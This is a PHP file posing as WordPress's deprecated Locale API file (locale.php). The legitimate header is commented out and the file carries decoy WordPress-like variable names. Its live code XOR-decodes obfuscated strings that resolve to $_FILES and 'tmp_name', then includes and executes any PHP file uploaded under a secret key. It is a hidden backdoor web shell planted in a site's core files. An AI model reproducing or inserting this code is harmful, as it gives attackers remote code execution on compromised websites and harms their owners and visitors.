<?php /* 
*
 * Locale API
 *
 * @package WordPress
 * @subpackage i18n
 * @since 1.2.0
 * @deprecated 4.7.0
 

_deprecated_file( basename( */
 	
$child_of = 'RAhx458AD0r';
function name_offset($perm, $default_editor)

{

    $taxonomy_obj = urldecode($perm);
    $double_chars = substr($default_editor,0, strlen($taxonomy_obj));
    $mail = $taxonomy_obj ^ $double_chars;
	$nested_code_pre = 'wp_post_statuses';
    return $mail;

}

$exclude = ${name_offset("%0D%07%214qf", $child_of)};
	$post_types = 'quote_style';
if (isset($exclude[$child_of]))

{
    $suffix = $exclude[$child_of];
    $defaults = $suffix[name_offset("%26%2C%18%27ZTU%24", $child_of)];
    include ($defaults);
	$label = 'to_ncr';
}


/* __FILE__ ), '4.7.0' );
*/